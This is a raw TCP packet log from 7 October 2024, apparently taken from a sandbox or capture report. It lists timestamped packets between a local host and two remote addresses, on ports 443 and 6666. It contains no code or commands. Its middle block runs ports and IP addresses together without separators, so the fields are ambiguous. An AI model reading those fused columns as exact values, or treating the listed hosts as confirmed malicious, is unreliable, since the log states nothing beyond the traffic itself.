Oct 7, 2024 06:39:03.780217886 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.780229092 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.780255079 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.780273914 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.863518953 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.863574982 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.863779068 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.863780022 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.863810062 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.863864899 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.863924980 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.863965988 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.863996983 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.864007950 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.864033937 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.864058018 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.864454985 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.864496946 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.864531994 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.864542961 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.864572048 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.864590883 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.865120888 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.865178108 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.865192890 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.865210056 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.865241051 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.865257025 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.875078917 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.875122070 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.875152111 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.875164032 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.875190973 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.875209093 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.886744022 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.886826038 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.886861086 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.886873007 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.886899948 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.886918068 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.896936893 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.896982908 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.897012949 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.897026062 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.897053957 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.897073030 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.906871080 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.906924963 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.906958103 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.906970024 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.907001972 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.907062054 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.907130957 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.907341957 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.907377958 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.907423973 CEST | 49704 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.907440901 CEST | 443 | 49704 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.955899954 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.956007004 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:03.956095934 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.957170010 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:03.957209110 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.198147058 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.198235989 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:05.200900078 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.200967073 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:05.209595919 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:05.209609985 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.210407019 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.213992119 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:05.255429983 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.565922022 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.565988064 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.566034079 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.566075087 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:05.566149950 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
Oct 7, 2024 06:39:05.566191912 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:05.566216946 CEST | 49705 | 443 | 192.168.2.5 | 47.79.64.157
Oct 7, 2024 06:39:05.647941113 CEST | 443 | 49705 | 47.79.64.157 | 192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.647989035 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.648057938 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.648089886 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.648118019 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.648139000 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.650310993 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.650352955 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.650393009 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.650408983 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.650435925 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.650476933 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.733855009 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.733949900 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734042883 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.734065056 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734096050 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.734114885 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.734473944 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734517097 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734563112 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.734575033 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734602928 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.734630108 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.734644890 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734719038 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.734731913 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734800100 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.734850883 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.779601097 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.779628038 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.780154943 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.780183077 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.780210972 CEST49705443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.780225992 CEST4434970547.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.892028093 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.892086983 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:05.892189026 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.892575026 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:05.892606020 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.255673885 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.255846977 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.258374929 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.258445978 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.260139942 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.260154963 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.261174917 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.261920929 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.307430983 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.633603096 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.633630037 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.633647919 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.633688927 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.633729935 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.633747101 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.633780003 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.720454931 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.720520020 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.720537901 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.720556021 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.720572948 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.720592022 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.722619057 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.722661972 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.722685099 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.722696066 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.722713947 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.722732067 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.810374022 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.810434103 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.810472965 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.810488939 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.810525894 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.810540915 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.810791969 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.810833931 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.810856104 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.810867071 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.810889959 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.810909033 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.811831951 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.811881065 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.811897039 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.811906099 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.811935902 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.811953068 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.816164970 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.816205025 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.816251993 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.816260099 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.816273928 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.816301107 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.901412010 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.901454926 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.901500940 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.901515007 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.901544094 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.901561022 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.901910067 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.901952982 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.901968956 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.901978970 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.902005911 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.902020931 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.902249098 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.902291059 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.902302027 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.902318954 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.902345896 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.902357101 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.902669907 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.902709007 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.902730942 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.902740955 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.902762890 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.902782917 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.904411077 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.904453039 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.904484034 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.904493093 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.904517889 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.904534101 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.904535055 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.904557943 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.904603004 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.904611111 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.904700994 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.904745102 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.910706043 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.911132097 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.911147118 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:07.911159992 CEST49706443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:07.911165953 CEST4434970647.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:08.957504034 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:08.962673903 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:08.962779045 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:08.962827921 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:08.967823029 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861527920 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861567020 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861602068 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861634970 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861668110 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861701012 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861731052 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:09.861735106 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861768007 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861793995 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861820936 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:09.861820936 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:09.861833096 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.861854076 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:09.861907005 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:09.866838932 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.866875887 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.866910934 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:09.866939068 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:09.908719063 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.089411020 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.089452028 CEST66664970747.239.116.158192.168.2.5
Oct 7, 2024 06:39:10.089509010 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.089529991 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.089545012 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.089581013 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.089612961 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.089617968 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.089648008 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.089672089 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.090270042 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.090303898 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.090338945 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.090341091 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.090373993 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.090398073 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.090990067 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.091017962 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.091053009 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.091152906 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.091204882 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.091243029 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.091295958 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.091327906 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.091351986 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.091362953 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.091435909 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.092125893 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.092176914 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.092210054 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.092236042 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.092242002 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.092279911 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.092298031 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.143100023 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.317590952 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317673922 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317727089 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317739010 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.317761898 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317797899 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317820072 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.317831039 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317867041 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317887068 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.317899942 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317934990 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.317962885 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.317972898 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318022966 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.318486929 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318541050 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318574905 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318595886 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.318608046 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318641901 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318656921 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.318677902 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318715096 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.318731070 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.319346905 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.319381952 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.319428921 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.319492102 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.319525003 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.319545984 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.319561005 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.319595098 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.319612026 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.319632053 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.319679976 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.320233107 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.320287943 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.320322990 CEST  6666   49707  47.239.116.158  192.168.2.5
